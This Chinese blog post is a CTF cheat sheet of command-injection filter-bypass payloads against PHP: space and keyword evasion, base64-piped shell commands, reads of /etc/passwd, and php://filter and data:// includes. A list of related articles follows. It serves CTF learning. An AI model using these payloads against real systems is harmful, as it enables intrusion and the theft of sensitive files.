CTF命令执行的常见姿势

最新推荐文章于 2025-06-12 00:28:25 发布
最新推荐文章于 2025-06-12 00:28:25 发布
阅读量1.7k 收藏 18
点赞数 1
CC 4.0 BY-SA版权
分类专栏: CTF 文章标签: php linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_40103894/article/details/127081718

命令执行的常见姿势

命令执行的常见姿势

?c=cat flag.php;

?c=tac flag.php||

?c=tac<fla’'g.php||

?c=tac<fla’'g.php||

tac<fla’'g.php||

?c=tac<fla’'g.php||

?c=tac<fla’'g.php||

?c=tac<fla’'g.php||

c=tac<fla’'g.php||

?c=nl<fla’'g.php||

?c=nl${IFS}fl’'ag.php||

?c=nl${IFS}fl’'ag.php

?c=/bin/c??${IFS}???

?c=system(“cat flag.php”);

?c=echo `ls`;

分隔符和空格被过滤,联合执行命令:

?ip=%0acd%09..%0als =?ip=;cd ..;ls

过滤目录分隔符**/**总结:

1、用反斜杠查看文件夹内容|ls \flag_is_here 或者直接|ls flag_is_here

2、分号同步执行cd和cat命令

127.0.0.1&cd flag_is_here;tac flag_224812813310817.php

竖线被过滤可以用分号代替

黑洞

    system($c." >/dev/null 2>&1");   //黑洞尝试分号绕过
payload:c=tac f*%26%26ls;

空格绕过方式

1.$IFS

2.$IFS$1

3.${IFS} – 单纯cat$IFS2,IFS2被bash解释器当做变量名,输不出来

结果,加一个{}就固定了变量名,如cat${IFS2}flag.php

4.$IFS$9 – 后面加个$与{}类似,起截断作用,$9是当前系统shell

进程第九个参数持有者,始终为空字符串,如

cat$IFS2$9flag.php

5.< 比如cat<a.tct:表示cat a.txt

6.<> 比如cat<>a.tct:表示cat a.txt

7.{cat,flag.php} //用逗号实现了空格功能,需要用{}括起来

8.%20: 空格的URL编码

9.%09: 需要php环境,如cat%09flag.php

过滤空格常见绕过方式:1.

文件函数绕过:

2.cat–由第一行开始显示内容,并将所有内容输出

3.tac–从最后一行倒序显示内容,并将所有内容输出

4.more– 根据窗口大小,一页一页的现实文件内容

5.**less **和more类似,但其优点可以往前翻页,而且进行可以搜索字符

6.head– 只显示头几行

7.**tail **–只显示最后几行

8.**nl **–类似于cat -n,显示时输出行号

9.tailf– 类似于tail -f

10.**vim **–使用vim工具打开文本

11.**vi **–使用vi打开文本cat 由第一行开始显示内容,并将所有内容输出

12.sort

文件函数绕过:

1.system()

2.passthru()

3.exec()

4.shell_exec()

5.popen()

6.proc_open()

7.pcntl_exec()

8.反引号**`` **同shell_exec()

9.system(“cat /etc/passwd”)<=>“\x73\x79\x73\x74\x65\x6d”("cat

/etc/passwd");

10. <=>

11. (sy.(st).em)(“cat /etc/passwd”);<=>

命令执行函数绕过:

1.**wh\o\ami ** //反斜线绕过

2.who"a"mi //双引号绕过

3.**whoa’m’i ** //单引号绕过

4.**whoam``i ** //反引号绕过

5.echo d2hvYW1p|base64 -d|sh

#base64绕过,其中d2hvYW1p是whoami的base64编码

6.echo d2hvYW1p|base64 -d|bash

#base64绕过,其中d2hvYW1p是whoami的base64编码

7.`echo d2hvYW1p|base64 -d`

//将其base64解码,然后用反引号来执行命令

8.echo 77686F616D69 | xxd -r -p | bash

//hex绕过,其中77686F616D69是whoami的hex编码

9.//$*和$@,$x(x 代表 1-9),${x}(x>=10) :比如ca${21}t a.txt表示cat a.txt 在没有传入参数的情况下,这些特殊字符默认为空,如下:

10.wh$1oami

11.who$@ami

12.whoa$*mi

过滤关键字段

1.**cat fl[abc]g.php ** //匹配[abc]中的任何一个

2.cat f[a-z]ag.txt //匹配a-z范围的任何字符

3.**cat fla* ** //用*匹配任意

4.a=f;d=ag;c=l;cat $a$c$d.php 表示cat flag.php//内联执行

5. //正则

6.利用正则:比如要读取etc/passwd

7. cat /???/???

8.cat /???/pass*

9.cat /etc$u/passwd

绕过文件名通配符绕过,绕过重要字段:

1. payload1:c=system(“nl fla???”);

2. payload2:c=system(“nl fla*”);

3. payload3:c=echo `nl fl’'ag.php`;或者c=echo

`nl fl“”ag.php`;

4. payload4:c=echo `nl fl\ag.php`;//转义字符绕

5. payload5:c=include($_GET[1]);&1=php://filter/read=convert.base64-encode/resource=flag.php

6. payload6:c=eval($_GET[1]);&1=system(‘nl flag.php’);

7. payload7:c=awk ‘{printf $0}’ flag.php||

另类操作

1. c=include$_GET[1]?>&1=php://filter/read=convert.base64-encode/resource=flag.php

2. c=include$_GET[1]?>&1=data://text/plain,

3. c=include$_GET[1]?>&1=data://text/plain;base64,PD9waHAgc3lzdGVtKCJjYXQgZmxhZy5waHAiKTs/Pg==

4、

c=	data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs/Pg==
上面解码是<?php system('cat flag.php');?>
CTF命令执行
afei001
03-29 745
练习环境     攻击机:kali     靶机:Ubuntu 17.04 1.发现靶机,进行端口扫描 root@afei:~# ifconfig eth0 eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500 inet 192.168.3.150 netmask 255.255.255.0 bro...
命令执行各种姿势总结
weixin_48427966的博客
04-24 2068
一、绕过if(!eval($c);web30。
gmailc2:一款基于Google SMTP的完全无法检测的C2服务器
qq_53058639的博客
07-24 1457
1、持久化;2、支持Shell访问;3、查看系统信息;4、…
攻防世界-MISC-CatFlag
最新发布
2301_80797059的博客
06-12 225
1.cat命令
ctf命令执行
qq_46540840的博客
03-24 910
文章目录前言一、知识要点二、举栗子1.CTFHub 技能树 综合过滤2.CTFHub 第一题附上一道简单题 前言 这里整理了一下基础题常用的过滤替代后续等深入学习时会再大幅不冲. 入门的话推荐ctfhub命令执行,上面有基础题适合小白入门比如还没入门的我wuwu… 一、知识要点 空格过滤替换品(常用为以下几个) %09(Tab键) IFS,IFS,IFS,IFS9,9,9,{IFS},$IFS < <> 重定向符 cat过滤替换品 more:一页一页的显示内容(linux环境下文本
CTF-命令执行
Luodehahajiang的博客
07-03 2540
ctf 命令执行 命令执行函数 命令执行绕过方法
CTF知识集-命令执行
星河梦瑾的博客
12-17 1269
includePATHAlinux的shell如果过滤空格,可以截取环境,例如执行命令env,会出现一堆命令
ctf php侧漏,ctf常见PHP漏洞小结
weixin_39588252的博客
04-01 1574
ctf常见PHP漏洞小结在做ctf题的时候经常会遇到一些PHP代码审计的题目,这里将我遇到过的常见漏洞做一个小结。md5()漏洞PHP在处理哈希字符串时,会利用”!=”或”==”来对哈希值进行比较,它把每一个以”0E”开头的哈希值都解释为0,所以如果两个不同的密码经过哈希以后,其哈希值都是以”0E”开头的,那么PHP将会认为他们相同,都是0。常见的payload有QNKCDZO24061070...
CTFPHP常见漏洞及利用(未完待续)
qq_34106499的博客
01-25 5517
总结ctf中出现的php漏洞及利用
Web安全之命令执行漏洞
qq_42751192的博客
08-12 1481
当 Web 应用需要调用一些执行系统命令的函数时,并且用户能控制这些函数中的参数时,就可以将恶意系统命令拼接到正常命令中,从而造成命令执行攻击,这就是命令执行漏洞。
ssrf漏洞利用+CTF实例
hyq99999的博客
09-08 1674
ssrf漏洞,redis未授权访问
命令执行,代码执行
2301_77315080的博客
09-26 585
依次将 array 数组中的每个值传递到 callback 函数 如果 callback 函数返回 true,则 array 数组的当前值会被包含在返回的结果数组中 数组的键名保留不变。本函数将用用户自定义的比较函数对一个数组中的值进行排序 如果要排序的数组需要用一种不寻常的标准进行排序,那么应该使用此函数。此函数将打开输出缓冲,当输出缓冲激活后,脚本将不会输出内容(除http标头外) 相反需要输出的内容被存储在内部缓冲区中。第一个参数 callback 是被调用的回调函数 其余参数是回调函数的参数。
CTF-命令执行【超详细】
2401_84578953的博客
05-17 754
当应用需要调用一些外部应用程序去处理内容的情况下,就会用到一些执行系统命令的函数。如PHP中的system、exec、shell_exec等,当用户可以控制命令执行函数中的参数时,将可以注入恶意命令到正常命令中,造成命令执行攻击。调用这些函数执行系统命令的时候,如果将用户的输入作为系统命令的参数拼接到。
CTF命令执行总结
qq_45927819的博客
11-13 4715
文章目录前言空格绕过命令分割符关键词过滤编码绕过 前言 最近遇到了好多命令执行的web题,这就来总结一下这方面的知识!! 空格绕过 常见的绕过符号有: $IFS$9 、${IFS} 、%09(php环境下)、 重定向符<>、> $IFS在linux下表示分隔符,如果不加{}则bash会将IFS解释为一个变量名, 加一个{}就固定了变量名,$IFS$9后面之所以加个$是为了起到截断的作用 ;为什么要用$9呢,因为$9只是当前系统shell进程的第九个参数的持有者,它始终为空字符串。 不仅 $
CTF-命令执行部分总结
weixin_44770698的博客
05-29 1954
因为自己是小白,还是想着尽量快一点的学习到许多知识,最近又做了CTFshow里面的部分萌新题,这里总结一下其中的部分萌新WEB题。 web 9 要求我们使用GET方式传入c参数,参数中还要匹配到system或者exec等关键字,这里算是一个小坑,还以为是不能有这些关键字,还尝试了passthru、和拼接绕过......很尴尬。 这个比较简单我们使用system来执行查看config.php就可以了。 web 10 这个题的含义就是正则匹配到system、exec等,则会提示你cmd e
CTFshow web入门——命令执行
热门推荐
小元砸的博客
01-29 1万+
web 29 <?php error_reporting(0); if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag/i", $c)){ eval($c); } }else{ highlight_file(__FILE__);
命令执行总结
m0_64180167的博客
11-24 1001
之前做了一大堆的题目 都没有进行总结 现在来总结一下命令执行 我遇到的内容这里我打算按照过滤进行总结依据我做过的题目。
CTF命令执行RCE
qq_53099119的博客
04-02 4388
md5() 函数计算字符串的 MD5 散列。md5() 函数使用 RSA 数据安全,包括 MD5 报文摘要算法。来自 RFC 1321 的解释 - MD5 报文摘要算法:MD5 报文摘要算法将任意长度的信息作为输入值,并将其换算成一个 128 位长度的"指纹信息"或"报文摘要"值来代表这个输入值,并以换算后的值作为结果。MD5 算法主要是为数字签名应用程序而设计的;
linux 测试命令执行时间
11-23
Linux中,你可以使用一些内置的时间测量工具来计算特定命令脚本的执行时间。以下是几种常用的方法: 1. **time 命令**: - `time command`: 这是最直接的方式,它会显示命令运行所花费的时间,包括CPU时间和真实执行时间。例如: ``` time sleep 5 ``` 2. **wc -l 命令** (适用于读取文件内容再执行命令的情况): 如果你想测量读取文件并解析其内容所花的时间,可以先计数文件行数,然后再次计数,比较两次计数的结果。例如: ``` time wc -l file.txt > /dev/null ``` 然后再次执行上述命令,将差值视为命令的执行时间。 3. **wall命令**(仅显示时间,无额外信息): ``` wall && your_command && wall ``` 先运行`wall`获取当前时间,然后执行你的命令,最后再运行一次`wall`,两次之间的差距就是你的命令执行时间。 4. **间接方法**(适合复杂情况): 使用`date`命令记录开始时间,然后执行你的命令,再记录结束时间,两者相减即可: ```bash start_time=$(date +%s) your_command end_time=$(date +%s) echo "Execution time: $(($end_time - $start_time)) seconds" ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值